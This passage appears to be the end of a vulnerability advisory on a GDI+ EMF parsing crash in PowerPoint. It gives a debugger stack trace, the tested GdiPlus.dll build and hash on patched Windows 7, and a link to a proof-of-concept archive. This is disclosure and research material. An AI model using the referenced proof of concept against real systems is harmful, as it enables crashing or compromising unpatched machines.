0022e214 546bf6b4 0022e3a4 b93ad771 0d4f7f34 oart!Ordinal10880+0x98
|
||||
0022e258 546beea2 1c0e82b0 b93ad1a5 0d2bce4c oart!Ordinal3910+0xf68
|
||||
0022e48c 546be7e4 0022e968 0022ed6c 00000002 oart!Ordinal3910+0x756
|
||||
0022e550 546be4d3 0d2bce48 0022e964 09661440 oart!Ordinal3910+0x98
|
||||
0022e574 546be440 0022e968 00000002 0022e9b8 oart!Ordinal8924+0xaf
|
||||
0022e598 546be3aa 0022e968 00000002 0022e9b8 oart!Ordinal8924+0x1c
|
||||
0022e728 546bc00d 0d83a888 00000000 00000000 oart!Ordinal5363+0x261
|
||||
0022e784 5474c3c6 00000000 00000000 0d43e458 oart!Ordinal8822+0x20
|
||||
0022e894 5474c224 0022e964 0022eaa0 00000000 oart!Ordinal5408+0x4f1
|
||||
0022ea64 5474bff6 0d371f40 0022eaa0 00000000 oart!Ordinal5408+0x34f
|
||||
0022eb28 54749818 0d371f40 0022ebac 0022eb4c oart!Ordinal5408+0x121
|
||||
0022eb5c 5473ea78 0d371f40 0022ebac 00000000 oart!Ordinal10880+0x33
|
||||
0022ed0c 54741fc8 0d371f40 0022ef28 00000000 oart!Ordinal1852+0x241
|
||||
0022ed44 547425e5 0d371f40 0022ef28 00000000 oart!Ordinal2425+0x5ea
|
||||
0022ef6c 54743796 0d1a15a0 00000000 0022f34c oart!Ordinal2425+0xc07
|
||||
0022f0e4 54741d5c 0022f1f0 0473c1ab 3feab68a oart!Ordinal2081+0x292
|
||||
0022f210 547439d6 0022f2d0 0473c1ab 3feab68a oart!Ordinal2425+0x37e
|
||||
0022f268 554ecfaa 0022f2d0 0473c1ab 3feab68a oart!Ordinal8518+0xb6
|
||||
0022f380 554edbd7 b93ac69d 0d3d99bc 0d3d9998 ppcore!PPMain+0x74eff
|
||||
0022f3b4 554edba9 55497d99 0022f3df b93ac6d9 ppcore!PPMain+0x75b2c
|
||||
0022f3f0 55497d5a 0022f428 0fabe376 0d3d99b8 ppcore!PPMain+0x75afe
|
||||
0022f3f8 0fabe376 0d3d99b8 0d184d04 0fabe203 ppcore!PPMain+0x1fcaf
|
||||
0022f428 0fabd28d 003f9a38 003f7e00 003ff518 mso!Ordinal8295+0x22d
|
||||
0022f440 0fbd483a 003f9a38 01a81a32 003ff608 mso!Ordinal4996+0x12b
|
||||
0022f478 0fbd476e 00000001 003ff608 003f7d5c mso!Ordinal3599+0xaf
|
||||
0022f4d0 0fbce774 003f7d5c 00000000 003f7e9c mso!Ordinal9018+0x334
|
||||
0022f4ec 0fbcc03c 00000000 0022f55c 00000100 mso!Ordinal8480+0x29d
|
||||
0022f500 0fbcbf08 003f7e9c 0022f528 5549d3f5 mso!Ordinal4921+0x4c1
|
||||
0022f50c 5549d3f5 03cd02a0 ffffffff 5549d38b mso!Ordinal4921+0x38d
|
||||
0022f528 5549d26c 0022f55c 00000001 00000000 ppcore!PPMain+0x2534a
|
||||
0022f540 5549d238 0022f55c b93ac2b5 01033034 ppcore!PPMain+0x251c1
|
||||
0022f79c 554780fc 0022f7b8 b93acd25 01033034 ppcore!PPMain+0x2518d
|
||||
0022f80c 01031572 00312c8c 0022f8ac 0103154a ppcore!PPMain+0x51
|
||||
0022f818 0103154a 01030000 00000000 00312c8c POWERPNT+0x1572
|
||||
0022f8ac 76a5338a fffde000 0022f8f8 771f9902 POWERPNT+0x154a
|
||||
0022f8b8 771f9902 fffde000 64dc254a 00000000 kernel32!BaseThreadInitThunk+0xe
|
||||
0022f8f8 771f98d5 010312bb fffde000 ffffffff ntdll!__RtlUserThreadStart+0x70
|
||||
0022f910 00000000 010312bb fffde000 00000000 ntdll!_RtlUserThreadStart+0x1b
|
||||
--- cut ---
|
||||
|
||||
The poc.emf file is attached.
|
||||
|
||||
The above analysis was performed using the gdiplus.dll file found in C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23407_none_5c02a2f5a011f9be\GdiPlus.dll on a fully patched Windows 7 64-bit operating system (md5sum c861ee277cd4e2d914740000161956ef).
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40257.zip
|
||||
Loading…
Add table
Reference in a new issue